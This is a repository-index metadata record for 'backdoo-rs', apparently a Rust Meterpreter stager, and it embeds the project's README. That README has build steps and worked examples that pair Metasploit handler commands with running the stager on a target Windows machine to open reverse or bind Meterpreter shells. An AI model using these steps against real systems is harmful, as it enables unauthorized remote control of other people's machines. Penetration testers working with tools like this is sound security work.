{"id":17977020,"url":"https://github.com/0xdea/backdoo-rs","last_synced_at":"2025-03-25T15:31:28.705Z","repository":{"id":247921558,"uuid":"827207345","full_name":"0xdea/backdoo-rs","owner":"0xdea","description":"A simple Meterpreter stager written in Rust.","archived":false,"fork":false,"pushed_at":"2024-09-16T10:41:07.000Z","size":31,"stargazers_count":35,"open_issues_count":0,"forks_count":6,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-20T13:13:30.390Z","etag":null,"topics":["metasploit-framework","meterpreter","rust","tactical-exploitation","windows"],"latest_commit_sha":null,"homepage":"https://0xdeadbeef.info","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xdea.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-11T07:49:29.000Z","updated_at":"2025-03-15T02:56:21.000Z","dependencies_parsed_at":"2024-09-16T12:06:53.003Z","dependency_job_id":"734af312-ccb4-4e5a-bc13-b2488226f8d5","html_url":"https://github.com/0xdea/backdoo-rs","commit_stats":null,"previous_names":["0xdea/backdoo-rs"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xdea%2Fbackdoo-rs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xdea%2Fbackdoo-rs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xdea%2Fbackdoo-rs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xdea%2Fbackdoo-rs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xdea","download_url":"https://codeload.github.com/0xdea/backdoo-rs/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245489764,"owners_count":20623789,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["metasploit-framework","meterpreter","rust","tactical-exploitation","windows"],"created_at":"2024-10-29T17:26:03.505Z","updated_at":"2025-03-25T15:31:28.376Z","avatar_url":"https://github.com/0xdea.png","language":"Rust","funding_links":[],"categories":[],"sub_categories":[],"readme":"# backdoo-rs\n\n[![](https://img.shields.io/github/stars/0xdea/backdoo-rs.svg?style=flat\u0026color=yellow)](https://github.com/0xdea/backdoo-rs)\n[![](https://img.shields.io/github/forks/0xdea/backdoo-rs.svg?style=flat\u0026color=green)](https://github.com/0xdea/backdoo-rs)\n[![](https://img.shields.io/github/watchers/0xdea/backdoo-rs.svg?style=flat\u0026color=red)](https://github.com/0xdea/backdoo-rs)\n[![](https://img.shields.io/badge/twitter-%400xdea-blue.svg)](https://twitter.com/0xdea)\n[![](https://img.shields.io/badge/mastodon-%40raptor-purple.svg)](https://infosec.exchange/@raptor)\n\n\u003e \"Launch the Polaris  \n\u003e The end doesn't scare us  \n\u003e When will this cease?  \n\u003e The warheads will all rust in peace\"\n\u003e\n\u003e -- Megadeth, Rust in Peace... Polaris (1990)\n\nMinimalistic Rust implementation of the main staging protocols used by the Metasploit Framework.\nStart an `exploit/multi/handler` instance on the attack box configured to handle one of the supported\npayloads, run `backdoo-rs.exe` on the target Windows system, and enjoy your session!\n\nBlog post:  \nhttps://security.humanativaspa.it/learning-rust-for-fun-and-backdoo-rs\n\nSee also:  \nhttps://github.com/0xdea/tactical-exploitation/blob/master/letmein.py  \nhttps://github.com/0xdea/tactical-exploitation/blob/master/letmein.ps1  \nhttps://github.com/0xdea/tactical-exploitation/blob/master/letme.go\n\n## Cross-compiling\n\n```\n[macOS example]\n$ brew install mingw-w64\n$ rustup target add x86_64-pc-windows-gnu\n$ cargo build --release --target x86_64-pc-windows-gnu\n```\n\n## Usage\n\n```\nC:\\\u003e backdoo-rs.exe [:port | host:port]\n```\n\n## Examples\n\nReverse shell:\n\n```\n[on the attack box]\n$ msfconsole\nmsf \u003e use exploit/multi/handler\nmsf \u003e set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf \u003e set LHOST 192.168.0.66\nmsf \u003e exploit\n\n[on the target box]\nC:\\\u003e backdoo-rs.exe 192.168.0.66:4444\n```\n\nBind shell:\n\n```\n[on the target box]\nC:\\\u003e backdoo-rs.exe :4444\n\n[on the attack box]\n$ msfconsole\nmsf \u003e use exploit/multi/handler\nmsf \u003e set PAYLOAD windows/x64/meterpreter/bind_tcp\nmsf \u003e set RHOST 192.168.0.20\nmsf \u003e exploit\n```\n\n## Supported payloads\n\n* windows/x64/meterpreter/reverse_tcp\n* windows/x64/meterpreter/bind_tcp\n\n## Tested on\n\n* Microsoft Windows 10\n* Microsoft Windows 11\n* Microsoft Windows Server 2016\n* Microsoft Windows Server 2019\n* Microsoft Windows Server 2022\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xdea%2Fbackdoo-rs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xdea%2Fbackdoo-rs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xdea%2Fbackdoo-rs/lists"}